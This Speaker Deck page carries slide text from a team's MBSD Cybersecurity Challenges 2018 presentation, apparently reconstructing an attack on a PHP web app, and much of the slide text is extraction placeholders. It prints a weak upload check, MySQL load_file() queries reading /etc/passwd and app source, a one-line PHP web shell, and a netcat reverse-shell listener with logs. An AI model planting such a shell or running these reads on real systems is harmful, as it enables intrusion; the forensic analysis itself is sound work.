Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド
Search
8ayac
December 12, 2018
Technology
1.9k
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド
チームIPFactoryとして発表したもの
8ayac
December 12, 2018
More Decks by 8ayac
See All by 8ayac
Free Bugs Campaign
8ayac
0
980
MBSD Cybersecurity Challenges 2017 最終審査会 発表スライド
8ayac
0
660
Other Decks in Technology
See All in Technology
Mastraエージェント、どのクラウドにデプロイする?
minorun365
PRO
2
180
SRE Lounge Hiroshimaへの招待
grimoh
0
640
CIで使うClaude
iwatatomoya
0
230
10年目を迎えた「ABEMA」がどのように AI 活用を推進して、AI 駆動開発にシフトしているのか / How ABEMA, entering its 10th year, is promoting the use of AI and shifting toward AI-driven development
miyukki
0
120
AI Driven AI Governance
pict3
0
330
DatabricksにおけるMCPソリューション
taka_aki
1
240
非定型なドキュメントを効率よくリファクタする 〜えぇ!?仕様書27本の移行が1日で終わったって!?〜
subroh0508
1
240
LLM/Agent評価:トップ営業の発言を「正解」にする 〜暗黙的正解による評価を営業資産に変える〜
takkuhiro
1
210
ループエンジニアリングでE2Eテストを実践
noriyukitakei
0
350
インフラと開発の垣根を超えていき!〜元AWSインフラエンジニアがAWS開発で奮闘している話〜
hatahata021
1
150
なぜ私たちのSREプラクティスはなかなか機能しないのか 〜システムより先に組織を見る〜 / Why our SRE practices aren't really working
vtryo
3
3.6k
Amazon EVS で VCF 9.0 / 9.1 のサポート開始まとめ
mtoyoda
0
290
Featured
See All Featured
Applied NLP in the Age of Generative AI
inesmontani
PRO
4
2.4k
AI: The stuff that nobody shows you
jnunemaker
PRO
8
820
Rebuilding a faster, lazier Slack
samanthasiow
85
9.6k
The Straight Up "How To Draw Better" Workshop
denniskardys
239
140k
The browser strikes back
jonoalderson
0
1.4k
Being A Developer After 40
akosma
91
590k
Leveraging LLMs for student feedback in introductory data science courses - posit::conf(2025)
minecr
1
310
Building an army of robots
kneath
306
46k
The Mindset for Success: Future Career Progression
greggifford
PRO
0
410
HTML-Aware ERB: The Path to Reactive Rendering @ RubyCon 2026, Rimini, Italy
marcoroth
2
320
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
12
1.2k
The Power of CSS Pseudo Elements
geoffreycrofte
82
6.3k
Transcript
MBSD Cybersecurity Challenges 2018
None
None
▋ ▋ ▋ ▋ ▋ ▋
▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋
▋ ▋ ▋
▋ ▋ ► ► ► ►
▋ ► ► ► ► ▋ ► ► ►
None
None
sendmessage.php ▋ ▋ ▋ $prefix = md5(time() . $user->id); $tname
= $prefix . basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {
sendmessage.php (2018/9/21 14:46:48) 180921 14:39:24 26247 Connect
[email protected]
on mysql
180921 14:41:06 26247 Query select load_file('/etc/hosts') 180921 14:41:12 26247 Query select load_file('/etc/passwd') 180921 14:42:30 26247 Query select load_file('/etc/issue') 180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf') 180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php') 180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php') 180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php') 180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php') 180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php') 180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </>
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1 [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
(2018/9/21 15:29:02) $ nc –lvp 4444 192.168.11.2 </>
(2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…
(2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…
(2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on
[0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$
(2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on
[0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$ 192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
None
▋ ▋ ▋
▋ ▋ ▋ POST
▋ ▋ ▋ POST POST
( ) ▋ ► ►
POST ▋ ► ►
None
38
▋ ▋ ▋ ▋ ▋ ▋ ▋
▋ ▋ ▋ ▋ ▋ ▋ ▋
▋ ► ▋ ► ▋ ►
▋ ▋
▋ ► ► ►
None